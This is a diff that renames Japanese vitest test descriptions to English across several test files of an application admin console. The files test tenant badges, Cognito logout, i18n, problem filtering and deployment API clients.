-    it("'unknown' リテラルで null を返すべき (install.sh fallback 値)", () => {
+    it("should return null for the literal 'unknown' (install.sh fallback value)", () => {
       expect(
         buildCodeBuildBuildUrl({
           buildId: "unknown",
@@ -291,8 +291,8 @@ describe("buildCodeBuildBuildUrl", () => {
     });
   });
 
-  describe("いずれかの要素が空文字のとき", () => {
-    it("null を返すべき (region 空)", () => {
+  describe("when any element is an empty string", () => {
+    it("should return null (region empty)", () => {
       expect(
         buildCodeBuildBuildUrl({
           buildId: "proj:uuid",
@@ -306,80 +306,80 @@ describe("buildCodeBuildBuildUrl", () => {
 });
 
 describe("tenantStatusBadgeColor", () => {
-  describe("provision-tenant.sh が書き込む実際の tenantStatus 値に対して", () => {
-    it("'Complete' を green にマップすべき (= provisioning 完了)", () => {
+  describe("for the actual tenantStatus values that provision-tenant.sh writes", () => {
+    it("should map 'Complete' to green (= provisioning complete)", () => {
       expect(tenantStatusBadgeColor("Complete")).toBe("green");
     });
 
-    it("'In progress' を blue にマップすべき (= provisioning 進行中)", () => {
+    it("should map 'In progress' to blue (= provisioning in progress)", () => {
       expect(tenantStatusBadgeColor("In progress")).toBe("blue");
     });
 
-    it("'Failed' を red にマップすべき (= provisioning 失敗)", () => {
+    it("should map 'Failed' to red (= provisioning failed)", () => {
       expect(tenantStatusBadgeColor("Failed")).toBe("red");
     });
 
-    it("'Deleted' を grey にマップすべき (= deprovisioned tenant)", () => {
+    it("should map 'Deleted' to grey (= deprovisioned tenant)", () => {
       expect(tenantStatusBadgeColor("Deleted")).toBe("grey");
     });
   });
 
-  describe("大文字 / 小文字ゆれを吸収するとき", () => {
-    it("'complete' (小文字) でも green を返すべき", () => {
+  describe("when absorbing upper/lower case variants", () => {
+    it("should return green for 'complete' (lowercase)", () => {
       expect(tenantStatusBadgeColor("complete")).toBe("green");
     });
 
-    it("'COMPLETE' (大文字) でも green を返すべき", () => {
+    it("should return green for 'COMPLETE' (uppercase)", () => {
       expect(tenantStatusBadgeColor("COMPLETE")).toBe("green");
     });
 
-    it("'failed' (小文字) でも red を返すべき", () => {
+    it("should return red for 'failed' (lowercase)", () => {
       expect(tenantStatusBadgeColor("failed")).toBe("red");
     });
 
-    it("'in progress' (小文字) でも blue を返すべき", () => {
+    it("should return blue for 'in progress' (lowercase)", () => {
       expect(tenantStatusBadgeColor("in progress")).toBe("blue");
     });
   });
 
-  describe("未知の値が来たとき", () => {
-    it("grey にフォールバックすべき (= 未定義状態)", () => {
+  describe("when an unknown value arrives", () => {
+    it("should fall back to grey (= undefined state)", () => {
       expect(tenantStatusBadgeColor("Unknown")).toBe("grey");
     });
 
-    it("空文字でも grey を返すべき", () => {
+    it("should return grey for an empty string", () => {
       expect(tenantStatusBadgeColor("")).toBe("grey");
     });
 
-    it("undefined / null 相当の文字列でも grey を返すべき", () => {
+    it("should return grey for strings equivalent to undefined / null", () => {
       expect(tenantStatusBadgeColor("undefined")).toBe("grey");
     });
   });
 });
 
 describe("tierBadgeColor", () => {
-  describe("各 tier に異なる色を割り当てるとき", () => {
-    it("basic は grey (= pooled の最小構成) であるべき", () => {
+  describe("when assigning a different color to each tier", () => {
+    it("should make basic grey (= pooled minimum configuration)", () => {
       expect(tierBadgeColor("basic")).toBe("grey");
     });
 
-    it("advanced は blue (= pooled の中間構成) であるべき", () => {
+    it("should make advanced blue (= pooled intermediate configuration)", () => {
       expect(tierBadgeColor("advanced")).toBe("blue");
     });
 
-    it("platinum は green (= silo 専用 stack) であるべき", () => {
+    it("should make platinum green (= silo-dedicated stack)", () => {
       expect(tierBadgeColor("platinum")).toBe("green");
     });
   });
 
-  describe("大文字 / 小文字ゆれを吸収するとき", () => {
-    it("'PLATINUM' でも green を返すべき (provision-tenant.sh の TIER 大文字比較に整合)", () => {
+  describe("when absorbing upper/lower case variants", () => {
+    it("should return green for 'PLATINUM' (consistent with provision-tenant.sh TIER uppercase comparison)", () => {
       expect(tierBadgeColor("PLATINUM")).toBe("green");
     });
   });
 
-  describe("未知の tier 値が来たとき", () => {
-    it("grey にフォールバックすべき", () => {
+  describe("when an unknown tier value arrives", () => {
+    it("should fall back to grey", () => {
       expect(tierBadgeColor("nonexistent")).toBe("grey");
     });
   });

--- a/apps/application-admin-console/src/auth/cognito.test.ts
+++ b/apps/application-admin-console/src/auth/cognito.test.ts
@@ -50,7 +50,7 @@ describe("beginLogout (Issue #833)", () => {
     vi.unstubAllGlobals();
   });
 
-  it("refresh token を /oauth2/revoke に POST してから sessionStorage を clear すべき", async () => {
+  it("should POST refresh token to /oauth2/revoke before clearing sessionStorage", async () => {
     storeTokens("refresh.jwt");
 
     await beginLogout(CONFIG);
@@ -65,7 +65,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(sessionStorage.getItem(TOKENS_KEY)).toBeNull();
   });
 
-  it("refresh token が無いときは /oauth2/revoke を呼ばずに redirect すべき", async () => {
+  it("should redirect without calling /oauth2/revoke when there is no refresh token", async () => {
     storeTokens(undefined);
 
     await beginLogout(CONFIG);
@@ -74,7 +74,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(assignSpy).toHaveBeenCalledTimes(1);
   });
 
-  it("/logout に client_id と logout_uri を付けて redirect すべき", async () => {
+  it("should redirect to /logout with client_id and logout_uri", async () => {
     storeTokens("refresh.jwt");
 
     await beginLogout(CONFIG);
@@ -86,7 +86,7 @@ describe("beginLogout (Issue #833)", () => {
     expect(redirectedTo.searchParams.get("logout_uri")).toBe("https://app.example.com/login");
   });
 
-  it("/oauth2/revoke が失敗しても redirect は実行されるべき (= revoke failure で sign-out が止まらない)", async () => {
+  it("should still redirect even when /oauth2/revoke fails (= sign-out does not stall on revoke failure)", async () => {
     storeTokens("refresh.jwt");
     fetchSpy.mockRejectedValueOnce(new Error("network down"));
 

--- a/apps/application-admin-console/src/i18n/i18n.test.tsx
+++ b/apps/application-admin-console/src/i18n/i18n.test.tsx
@@ -20,12 +20,12 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     return <I18nProvider>{children}</I18nProvider>;
   }
 
-  it("default locale は ja (navigator.language 未対応の test 環境 default)", () => {
+  it("should default locale to ja (default for test envs that don't support navigator.language)", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     expect(result.current.locale).toMatch(/^(ja|en)$/);
   });
 
-  it("setLocale が localStorage に永続化し次回起動で復元すべき", () => {
+  it("should persist setLocale to localStorage and restore on next startup", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(result.current.locale).toBe("en");
@@ -33,7 +33,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(window.localStorage.getItem("tenkacloud.application-admin.locale")).toBe("en");
   });
 
-  it("t() は dot-separated key で nested dictionary を引くべき", () => {
+  it("should look up nested dictionary entries via dot-separated key in t()", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("ja"));
     expect(result.current.t("app.title")).toBe("TenkaCloud アプリケーション管理コンソール");
@@ -41,7 +41,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current.t("app.title")).toBe("TenkaCloud Application Admin Console");
   });
 
-  it("locale で key 未定義なら en で fallback、 en にも無ければ raw key", () => {
+  it("should fall back to en when the key is not defined in the locale, or return raw key when also absent in en", () => {
     const { result } = renderHook(() => useT(), { wrapper });
     // 全 locale にあるキー → 翻訳成功
     expect(result.current("nav.problems")).toBeTruthy();
@@ -50,7 +50,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(result.current("nonexistent.key")).toBe("nonexistent.key");
   });
 
-  it("SUPPORTED_LOCALES = 2 言語 [ja, en] (#1078 で zh/es 廃止)", () => {
+  it("should have SUPPORTED_LOCALES = 2 languages [ja, en] (zh/es dropped in #1078)", () => {
     const supported: readonly LocaleCode[] = ["ja", "en"];
     for (const code of supported) {
       const dict = _testInternals.LOCALE_DICTIONARIES[code];
@@ -60,7 +60,7 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     }
   });
 
-  it("locale 変更時に <html lang> が追従すべき", () => {
+  it("should sync <html lang> when locale changes", () => {
     const { result } = renderHook(() => useI18n(), { wrapper });
     act(() => result.current.setLocale("en"));
     expect(document.documentElement.lang).toBe("en");
@@ -68,13 +68,13 @@ describe("i18n homegrown (Issue #583 Phase 1.A)", () => {
     expect(document.documentElement.lang).toBe("ja");
   });
 
-  it("useI18n を Provider 外で呼ぶと throw すべき (= configuration error の早期発見)", () => {
+  it("should throw when useI18n is called outside Provider (= early detection of configuration error)", () => {
     // renderHook で wrapper を渡さないと throws する
     expect(() => renderHook(() => useI18n())).toThrow(/I18nProvider/);
   });
 
   // 翻訳結果が UI に出ることを実 render で確認
-  it("Provider 配下で翻訳結果が UI に反映されるべき", () => {
+  it("should reflect translation result in the UI under Provider", () => {
     function Probe() {
       const t = useT();
       return <div>{t("app.loading")}</div>;

--- a/apps/application-admin-console/src/lib/competitor-accounts-filter.test.ts
+++ b/apps/application-admin-console/src/lib/competitor-accounts-filter.test.ts
@@ -7,11 +7,11 @@ import {
 } from "./competitor-accounts-filter";
 
 describe("filterVerifiedAccounts (Issue #671)", () => {
-  it("null は空配列を返すべき", () => {
+  it("should return an empty array for null", () => {
     expect(filterVerifiedAccounts(null)).toEqual([]);
   });
 
-  it("verified=true のみ通すべき", () => {
+  it("should pass through only verified=true", () => {
     const accounts = [
       {
         awsAccountId: "111111111111",
@@ -33,7 +33,7 @@ describe("filterVerifiedAccounts (Issue #671)", () => {
     expect(filterVerifiedAccounts(accounts).map((a) => a.awsAccountId)).toEqual(["111111111111"]);
   });
 
-  it('verified が string "true" / number 1 の truthy 値も通すべき (= ABI 揺れ対策)', () => {
+  it('should also pass truthy values such as string "true" / number 1 for verified (= ABI drift guard)', () => {
     const accounts = [
       {
         awsAccountId: "111111111111",
@@ -57,21 +57,21 @@ describe("filterVerifiedAccounts (Issue #671)", () => {
 });
 
 describe("formatCompetitorAccountsLoadError (Issue #815)", () => {
-  it("ApiError 401 は friendly 再ログインメッセージに flip すべき", () => {
+  it("should flip ApiError 401 into a friendly re-login message", () => {
     const msg = formatCompetitorAccountsLoadError(
       new ApiError(StatusCodes.UNAUTHORIZED, "missing_tenant_claim"),
     );
     expect(msg).toMatch(/再ログイン/);
   });
 
-  it("ApiError 500 等の他 status は raw message を返すべき (= dev debug)", () => {
+  it("should return raw message for other statuses such as ApiError 500 (= dev debug)", () => {
     const msg = formatCompetitorAccountsLoadError(
       new ApiError(StatusCodes.INTERNAL_SERVER_ERROR, "DynamoDB throttle"),
     );
     expect(msg).toContain("DynamoDB throttle");
   });
 
-  it("Error 以外 (= 文字列 / null 等) は String() で safe stringify すべき", () => {
+  it("should safe-stringify non-Error values via String() (= e.g. string / null)", () => {
     expect(formatCompetitorAccountsLoadError("plain string")).toBe("plain string");
     expect(formatCompetitorAccountsLoadError(null)).toBe("null");
   });

--- a/apps/application-admin-console/src/lib/competitor-bootstrap.test.ts
+++ b/apps/application-admin-console/src/lib/competitor-bootstrap.test.ts
@@ -6,15 +6,15 @@ import { isBootstrapUrlMissing } from "./competitor-bootstrap";
  * UI 側はこの判定を使って CompetitorAccounts 画面に警告 banner を出す。
  */
 describe("isBootstrapUrlMissing (Issue #1055)", () => {
-  it("undefined は missing として扱うべき", () => {
+  it("should treat undefined as missing", () => {
     expect(isBootstrapUrlMissing(undefined)).toBe(true);
   });
 
-  it("空文字列は missing として扱うべき", () => {
+  it("should treat empty string as missing", () => {
     expect(isBootstrapUrlMissing("")).toBe(true);
   });
 
-  it("S3 URL が注入されていれば missing ではないべき", () => {
+  it("should NOT treat an injected S3 URL as missing", () => {
     expect(
       isBootstrapUrlMissing(
         "https://tenkacloud-bootstrap-123.s3.ap-northeast-1.amazonaws.com/competitor-bootstrap.yaml",
@@ -22,7 +22,7 @@ describe("isBootstrapUrlMissing (Issue #1055)", () => {
     ).toBe(false);
   });
 
-  it("GitHub raw URL (= 旧 fallback) も missing 扱いはしない (= 値が入っている時点で operator 配線済の判定)", () => {
+  it("should NOT treat a GitHub raw URL (= legacy fallback) as missing (= any value present means operator is wired up)", () => {
     // fallback URL も「URL が注入されている」 扱いにする (= 警告は出さない)。
     // raw URL 自体が CFn で reject される問題は #1053 で別途解決される。
     expect(

--- a/apps/application-admin-console/src/lib/problem-filter.test.ts
+++ b/apps/application-admin-console/src/lib/problem-filter.test.ts
@@ -40,31 +40,31 @@ describe("filterProblems (Issue #834)", () => {
     }),
   ];
 
-  it("空 criteria は全件返すべき", () => {
+  it("should return all items for empty criteria", () => {
     expect(filterProblems(problems, EMPTY_FILTER_CRITERIA)).toHaveLength(3);
   });
 
-  it("search が name に substring match すれば残るべき (case-insensitive)", () => {
+  it("should keep items whose name substring-matches search (case-insensitive)", () => {
     const res = filterProblems(problems, { ...EMPTY_FILTER_CRITERIA, search: "BATTLE" });
     expect(res.map((p) => p.id)).toEqual(["p2", "p3"]);
   });
 
-  it("search は shortDescription / tags も走査すべき", () => {
+  it("should scan shortDescription / tags for search as well", () => {
     const res = filterProblems(problems, { ...EMPTY_FILTER_CRITERIA, search: "migration" });
     expect(res.map((p) => p.id)).toEqual(["p3"]);
   });
 
-  it("category filter が 1 つ指定されたら AND 条件で絞るべき", () => {
+  it("should narrow via AND when one category filter is specified", () => {
     const res = filterProblems(problems, { ...EMPTY_FILTER_CRITERIA, categories: ["Battle"] });
     expect(res.map((p) => p.id)).toEqual(["p2", "p3"]);
   });
 
-  it("status filter で draft のみ残すべき", () => {
+  it("should keep only draft items via status filter", () => {
     const res = filterProblems(problems, { ...EMPTY_FILTER_CRITERIA, statuses: ["draft"] });
     expect(res.map((p) => p.id)).toEqual(["p2"]);
   });
 
-  it("difficulty multi-select で複数 level を OR で残すべき", () => {
+  it("should keep multiple levels via OR for difficulty multi-select", () => {
     const res = filterProblems(problems, {
       ...EMPTY_FILTER_CRITERIA,
       difficulties: [1, 5],
@@ -72,7 +72,7 @@ describe("filterProblems (Issue #834)", () => {
     expect(res.map((p) => p.id)).toEqual(["p1", "p3"]);
   });
 
-  it("tag filter mode=or は いずれか含む 行を残すべき", () => {
+  it("should keep rows that contain any tag when tag filter mode=or", () => {
     const res = filterProblems(problems, {
       ...EMPTY_FILTER_CRITERIA,
       tags: ["lambda", "flag"],
@@ -81,7 +81,7 @@ describe("filterProblems (Issue #834)", () => {
     expect(res.map((p) => p.id)).toEqual(["p1", "p3"]);
   });
 
-  it("tag filter mode=and は 全て含む 行のみ残すべき", () => {
+  it("should keep only rows that contain all tags when tag filter mode=and", () => {
     const res = filterProblems(problems, {
       ...EMPTY_FILTER_CRITERIA,
       tags: ["ec2", "lambda"],
@@ -90,7 +90,7 @@ describe("filterProblems (Issue #834)", () => {
     expect(res.map((p) => p.id)).toEqual(["p3"]);
   });
 
-  it("複数 filter は AND で組み合わさるべき", () => {
+  it("should combine multiple filters via AND", () => {
     const res = filterProblems(problems, {
       ...EMPTY_FILTER_CRITERIA,
       search: "battle",
@@ -100,34 +100,34 @@ describe("filterProblems (Issue #834)", () => {
     expect(res.map((p) => p.id)).toEqual(["p3"]);
   });
 
-  it("0 hit になっても空配列を返す (= UI 側で empty state)", () => {
+  it("should return an empty array on zero hits (= UI handles empty state)", () => {
     const res = filterProblems(problems, { ...EMPTY_FILTER_CRITERIA, search: "nonexistent" });
     expect(res).toEqual([]);
   });
 });
 
 describe("isFilterActive", () => {
-  it("空 criteria は active=false", () => {
+  it("should return active=false for empty criteria", () => {
     expect(isFilterActive(EMPTY_FILTER_CRITERIA)).toBe(false);
   });
 
-  it("search 1 文字でも active=true", () => {
+  it("should return active=true even with a single search character", () => {
     expect(isFilterActive({ ...EMPTY_FILTER_CRITERIA, search: "x" })).toBe(true);
   });
 
-  it("各 filter の少なくとも 1 つが non-empty なら active", () => {
+  it("should return active when at least one filter is non-empty", () => {
     expect(isFilterActive({ ...EMPTY_FILTER_CRITERIA, categories: ["Battle"] })).toBe(true);
     expect(isFilterActive({ ...EMPTY_FILTER_CRITERIA, tags: ["sample"] })).toBe(true);
     expect(isFilterActive({ ...EMPTY_FILTER_CRITERIA, difficulties: [1] })).toBe(true);
   });
 
-  it("search が空白のみは active=false (= trim 比較)", () => {
+  it("should return active=false for whitespace-only search (= trim comparison)", () => {
     expect(isFilterActive({ ...EMPTY_FILTER_CRITERIA, search: "   " })).toBe(false);
   });
 });
 
 describe("collectTagFacets", () => {
-  it("出現頻度の降順 + タイは alphabetical で sort すべき", () => {
+  it("should sort by descending frequency with alphabetical tiebreaker", () => {
     const problems = [
       sample({ id: "p1", tags: ["a", "b", "c"] }),
       sample({ id: "p2", tags: ["a", "b"] }),
@@ -141,30 +141,30 @@ describe("collectTagFacets", () => {
     ]);
   });
 
-  it("空配列なら空 facets", () => {
+  it("should return empty facets for an empty array", () => {
     expect(collectTagFacets([])).toEqual([]);
   });
 });
 
 describe("toggleTagFilter (Issue #835)", () => {
-  it("空 → 1 タグ click でそのタグ 1 件のみ active", () => {
+  it("should make only that single tag active when clicking one tag from empty", () => {
     const next = toggleTagFilter(EMPTY_FILTER_CRITERIA, "sample");
     expect(next.tags).toEqual(["sample"]);
   });
 
-  it("既に同タグ 1 件のみ active → 同タグ click で clear (toggle)", () => {
+  it("should clear (toggle) when clicking the same tag that is already the only active one", () => {
     const start = { ...EMPTY_FILTER_CRITERIA, tags: ["sample"] };
     const next = toggleTagFilter(start, "sample");
     expect(next.tags).toEqual([]);
   });
 
-  it("別タグが active なら 「そのタグだけで絞り込み」 に切り替わるべき (= 単 click は全面切替)", () => {
+  it("should switch to 'narrow by that tag only' when another tag is active (= single click is full replace)", () => {
     const start = { ...EMPTY_FILTER_CRITERIA, tags: ["sample"] };
     const next = toggleTagFilter(start, "battle");
     expect(next.tags).toEqual(["battle"]);
   });
 
-  it("他 filter (search / category 等) は維持すべき", () => {
+  it("should preserve other filters (search / category etc.)", () => {
     const start = {
       ...EMPTY_FILTER_CRITERIA,
       search: "x",

--- a/apps/application-admin-console/src/lib/tenant-display.test.ts
+++ b/apps/application-admin-console/src/lib/tenant-display.test.ts
@@ -2,23 +2,23 @@ import { describe, expect, it } from "vitest";
 import { resolveTenantDisplayName } from "./tenant-display";
 
 describe("resolveTenantDisplayName (Issue #830)", () => {
-  it("custom:tenantName が非空文字列なら そのまま返すべき", () => {
+  it("should return custom:tenantName as-is when it is a non-empty string", () => {
     const res = resolveTenantDisplayName({ "custom:tenantName": "Acme" });
     expect(res).toEqual({ displayName: "Acme", fromFallback: false });
   });
 
-  it("前後の空白は trim すべき (= Cognito attribute の trailing space 揺れ対策)", () => {
+  it("should trim leading and trailing whitespace (= guards Cognito attribute trailing-space drift)", () => {
     const res = resolveTenantDisplayName({ "custom:tenantName": "  Acme  " });
     expect(res.displayName).toBe("Acme");
     expect(res.fromFallback).toBe(false);
   });
 
-  it("custom:tenantName が undefined なら displayName=null + fromFallback=true", () => {
+  it("should return displayName=null + fromFallback=true when custom:tenantName is undefined", () => {
     const res = resolveTenantDisplayName({});
     expect(res).toEqual({ displayName: null, fromFallback: true });
   });
 
-  it("custom:tenantName が空文字 / 空白のみなら fromFallback=true (= UUID-like tenantId を welcome に出さない)", () => {
+  it("should set fromFallback=true when custom:tenantName is empty or whitespace-only (= do not surface UUID-like tenantId in welcome)", () => {
     expect(resolveTenantDisplayName({ "custom:tenantName": "" })).toEqual({
       displayName: null,
       fromFallback: true,
@@ -29,11 +29,11 @@ describe("resolveTenantDisplayName (Issue #830)", () => {
     });
   });
 
-  it("claims 自体が null (= 未認証 / token decode 失敗) なら fromFallback=true", () => {
+  it("should set fromFallback=true when claims itself is null (= unauthenticated / token decode failure)", () => {
     expect(resolveTenantDisplayName(null)).toEqual({ displayName: null, fromFallback: true });
   });
 
-  it("UUID v4 形状の tenantId が tenantName 欠落時に welcome に漏れないこと (= 主要回帰防止)", () => {
+  it("should NOT leak a UUID v4-shaped tenantId into the welcome when tenantName is missing (= primary regression guard)", () => {
     const claims = {
       "custom:tenantId": "3f01a734-9652-4065-a391-fa1b4d45ae26",
       "custom:tenantName": undefined,

--- a/apps/application-admin-console/test/App.test.tsx
+++ b/apps/application-admin-console/test/App.test.tsx
@@ -54,22 +54,22 @@ describe("App", () => {
     localStorage.clear();
   });
 
-  describe("/login に直接アクセスしたとき", () => {
-    it("LoginPage が表示されサインインボタンを持つべき", async () => {
+  describe("when accessing /login directly", () => {
+    it("should render LoginPage with a sign-in button", async () => {
       renderApp("/login");
       expect(await screen.findByRole("button", { name: "サインイン" })).toBeInTheDocument();
     });
   });
 
-  describe("未認証で / にアクセスしたとき", () => {
-    it("LoginPage へ redirect され、サインインボタンが表示されるべき", async () => {
+  describe("when accessing / unauthenticated", () => {
+    it("should redirect to LoginPage and show the sign-in button", async () => {
       renderApp("/");
       expect(await screen.findByRole("button", { name: "サインイン" })).toBeInTheDocument();
     });
   });
 
-  describe("有効な token を sessionStorage に持って / にアクセスしたとき", () => {
-    it("JWT custom:tenantName を greeting に表示すべき", async () => {
+  describe("when accessing / with a valid token in sessionStorage", () => {
+    it("should display JWT custom:tenantName in the greeting", async () => {
       loginAs({
         email: "admin@example.com",
         "custom:tenantId": "t-acme",
@@ -82,7 +82,7 @@ describe("App", () => {
       ).toBeInTheDocument();
     });
 
-    it("custom:tenantName が無いときは fallback プレースホルダ (= UUID-like tenantId を welcome に出さない、 Issue #830)", async () => {
+    it("should use the fallback placeholder when custom:tenantName is missing (= do not show a UUID-like tenantId in the welcome, Issue #830)", async () => {
       loginAs({
         email: "admin@example.com",
         "custom:tenantId": "3f01a734-9652-4065-a391-fa1b4d45ae26",
@@ -98,7 +98,7 @@ describe("App", () => {
       expect(screen.getByText(/テナント名が JWT に含まれていません/)).toBeInTheDocument();
     });
 
-    it("config.tenantName の placeholder ('Shared Pooled Tenant') を画面に出してはいけない", async () => {
+    it("should NOT show the config.tenantName placeholder ('Shared Pooled Tenant') on screen", async () => {
       loginAs({
         email: "admin@example.com",
         "custom:tenantId": "t-acme",

--- a/apps/application-admin-console/test/api/client.test.ts
+++ b/apps/application-admin-console/test/api/client.test.ts
@@ -15,8 +15,8 @@ const config: AppConfig = {
 describe("createApiClient", () => {
   afterEach(() => vi.restoreAllMocks());
 
-  describe("GET 呼び出し時", () => {
-    it("apiBaseUrl にパスを連結し Authorization ヘッダを付与すべき", async () => {
+  describe("when calling GET", () => {
+    it("should concatenate path to apiBaseUrl and attach Authorization header", async () => {
       const fetchMock = vi
         .fn()
         .mockResolvedValue(new Response(JSON.stringify({ apps: [] }), { status: 200 }));
@@ -31,8 +31,8 @@ describe("createApiClient", () => {
     });
   });
 
-  describe("POST 呼び出し時", () => {
-    it("content-type: application/json を付け body を JSON stringify して送るべき", async () => {
+  describe("when calling POST", () => {
+    it("should set content-type: application/json and JSON.stringify the body", async () => {
       const fetchMock = vi
         .fn()
         .mockResolvedValue(new Response(JSON.stringify({ ok: true }), { status: 201 }));
@@ -48,8 +48,8 @@ describe("createApiClient", () => {
     });
   });
 
-  describe("API が 4xx/5xx を返したとき", () => {
-    it("ApiError を投げるべき (status と body を含む)", async () => {
+  describe("when API returns 4xx/5xx", () => {
+    it("should throw an ApiError (including status and body)", async () => {
       // Response body は 1 度しか read できないので毎回 fresh な Response を返す
       vi.stubGlobal(
         "fetch",
@@ -67,8 +67,8 @@ describe("createApiClient", () => {
     });
   });
 
-  describe("apiBaseUrl の末尾スラッシュ", () => {
-    it("有る/無しどちらでも同じ URL を組み立てるべき", async () => {
+  describe("trailing slash on apiBaseUrl", () => {
+    it("should build the same URL regardless of trailing slash presence", async () => {
       const fetchMock = vi
         .fn()
         .mockImplementation(() => Promise.resolve(new Response("{}", { status: 200 })));

--- a/apps/application-admin-console/test/api/competitor-accounts-client.test.ts
+++ b/apps/application-admin-console/test/api/competitor-accounts-client.test.ts
@@ -38,7 +38,7 @@ function fakeClient(response: unknown): { client: ApiClient; calls: CapturedCall
 }
 
 describe("listCompetitorAccounts", () => {
-  it("GET /admin/competitor-accounts を呼ぶべき", async () => {
+  it("should call GET /admin/competitor-accounts", async () => {
     const { client, calls } = fakeClient({ items: [] });
     await listCompetitorAccounts(client);
     expect(calls[0]?.path).toBe("admin/competitor-accounts");
@@ -47,7 +47,7 @@ describe("listCompetitorAccounts", () => {
 });
 
 describe("createCompetitorAccount", () => {
-  it("POST /admin/competitor-accounts に body を送り externalId を含む response を返すべき", async () => {
+  it("should POST body to /admin/competitor-accounts and return response with externalId", async () => {
     const { client, calls } = fakeClient({
       awsAccountId: "222222222222",
       region: "ap-northeast-1",
@@ -72,7 +72,7 @@ describe("createCompetitorAccount", () => {
 });
 
 describe("verifyCompetitorAccount", () => {
-  it("POST /admin/competitor-accounts/{awsAccountId}/verify を呼ぶべき (URL encode)", async () => {
+  it("should call POST /admin/competitor-accounts/{awsAccountId}/verify (URL encode)", async () => {
     const { client, calls } = fakeClient({
       awsAccountId: "222222222222",
       region: "ap-northeast-1",
@@ -90,7 +90,7 @@ describe("verifyCompetitorAccount", () => {
 });
 
 describe("deleteCompetitorAccount", () => {
-  it("DELETE /admin/competitor-accounts/{awsAccountId} を呼ぶべき", async () => {
+  it("should call DELETE /admin/competitor-accounts/{awsAccountId}", async () => {
     const { client, calls } = fakeClient({});
     await deleteCompetitorAccount(client, "222222222222");
     expect(calls[0]?.path).toBe("admin/competitor-accounts/222222222222");

--- a/apps/application-admin-console/test/api/deploy-client.test.ts
+++ b/apps/application-admin-console/test/api/deploy-client.test.ts
@@ -46,7 +46,7 @@ function fakeClient(response: unknown): { client: ApiClient; calls: CapturedCall
 }
 
 describe("startDeployment", () => {
-  it("POST /problems/:problemId/deploy にボディを送るべき", async () => {
+  it("should POST body to /problems/:problemId/deploy", async () => {
     const { client, calls } = fakeClient({
       jobId: "01H",
       status: "PENDING",
@@ -68,7 +68,7 @@ describe("startDeployment", () => {
     });
   });
 
-  it("problemId に特殊文字が来ても URL encode するべき", async () => {
+  it("should URL-encode problemId even with special characters", async () => {
     const { client, calls } = fakeClient({
       jobId: "01H",
       status: "PENDING",
@@ -86,13 +86,13 @@ describe("startDeployment", () => {
 });
 
 describe("deleteDeployment", () => {
-  it("DELETE /deployments/:jobId を呼ぶべき", async () => {
+  it("should call DELETE /deployments/:jobId", async () => {
     const { client, calls } = fakeClient(undefined);
     await deleteDeployment(client, "01H");
     expect(calls[0]).toEqual({ path: "/deployments/01H", method: "DELETE" });
   });
 
-  it("jobId に特殊文字が来ても URL encode するべき", async () => {
+  it("should URL-encode jobId even with special characters", async () => {
     const { client, calls } = fakeClient(undefined);
     await deleteDeployment(client, "a/b");
     expect(calls[0]?.path).toBe("/deployments/a%2Fb");
@@ -100,7 +100,7 @@ describe("deleteDeployment", () => {
 });
 
 describe("getDeployment", () => {
-  it("GET /deployments/:jobId を呼ぶべき", async () => {
+  it("should call GET /deployments/:jobId", async () => {
     const { client, calls } = fakeClient({
       jobId: "01H",
       problemId: "p",
@@ -120,7 +120,7 @@ describe("getDeployment", () => {
 });
 
 describe("parseStackOutputs", () => {
-  it("map 形式の stackOutputs から string 値だけを取り出すべき", () => {
+  it("should extract only string values from map-form stackOutputs", () => {
     expect(
       parseStackOutputs(
         JSON.stringify({
@@ -132,7 +132,7 @@ describe("parseStackOutputs", () => {
     ).toEqual({ FrontendUrl: "https://app.example.com" });
   });
 
-  it("CloudFormation Output 配列形式から OutputKey/OutputValue を取り出すべき", () => {
+  it("should extract OutputKey/OutputValue from CloudFormation Output array form", () => {
     expect(
       parseStackOutputs(
         JSON.stringify([
@@ -144,7 +144,7 @@ describe("parseStackOutputs", () => {
     ).toEqual({ FrontendUrl: "https://app.example.com" });
   });
 
-  it("壊れた JSON や非 object は空 map にすべき", () => {
+  it("should return empty map for broken JSON or non-object", () => {
     expect(parseStackOutputs(undefined)).toEqual({});
     expect(parseStackOutputs("{bad json")).toEqual({});
     expect(parseStackOutputs(JSON.stringify("not-object"))).toEqual({});
@@ -152,13 +152,13 @@ describe("parseStackOutputs", () => {
 });
 
 describe("listDeployments", () => {
-  it("GET /problems/:problemId/deployments を呼ぶべき (params 無し)", async () => {
+  it("should call GET /problems/:problemId/deployments (no params)", async () => {
     const { client, calls } = fakeClient({ items: [], nextCursor: undefined });
     await listDeployments(client, "p");
     expect(calls[0]?.path).toBe("/problems/p/deployments");
   });
 
-  it("limit / cursor を query string に乗せるべき", async () => {
+  it("should put limit / cursor onto the query string", async () => {
     const { client, calls } = fakeClient({ items: [], nextCursor: undefined });
     await listDeployments(client, "p", { limit: 10, cursor: "abc" });
     expect(calls[0]?.path).toBe("/problems/p/deployments?limit=10&cursor=abc");
@@ -166,7 +166,7 @@ describe("listDeployments", () => {
 });
 
 describe("TERMINAL_STATUSES", () => {
-  it("terminal status を含むべき (poll 停止条件)", () => {
+  it("should contain terminal statuses (poll stop condition)", () => {
     expect(TERMINAL_STATUSES.has("COMPLETE")).toBe(true);
     expect(TERMINAL_STATUSES.has("FAILED")).toBe(true);
     expect(TERMINAL_STATUSES.has("DELETED")).toBe(true);
@@ -174,7 +174,7 @@ describe("TERMINAL_STATUSES", () => {
     expect(TERMINAL_STATUSES.has("AUTO_DELETED")).toBe(true);
   });
 
-  it("PENDING / IN_PROGRESS / DELETING は含まないべき", () => {
+  it("should NOT contain PENDING / IN_PROGRESS / DELETING", () => {
     expect(TERMINAL_STATUSES.has("PENDING")).toBe(false);
     expect(TERMINAL_STATUSES.has("IN_PROGRESS")).toBe(false);
     expect(TERMINAL_STATUSES.has("DELETING")).toBe(false);
@@ -182,7 +182,7 @@ describe("TERMINAL_STATUSES", () => {
 });
 
 describe("getStackProgress", () => {
-  it("GET /deployments/:jobId/stack-progress を呼ぶべき", async () => {
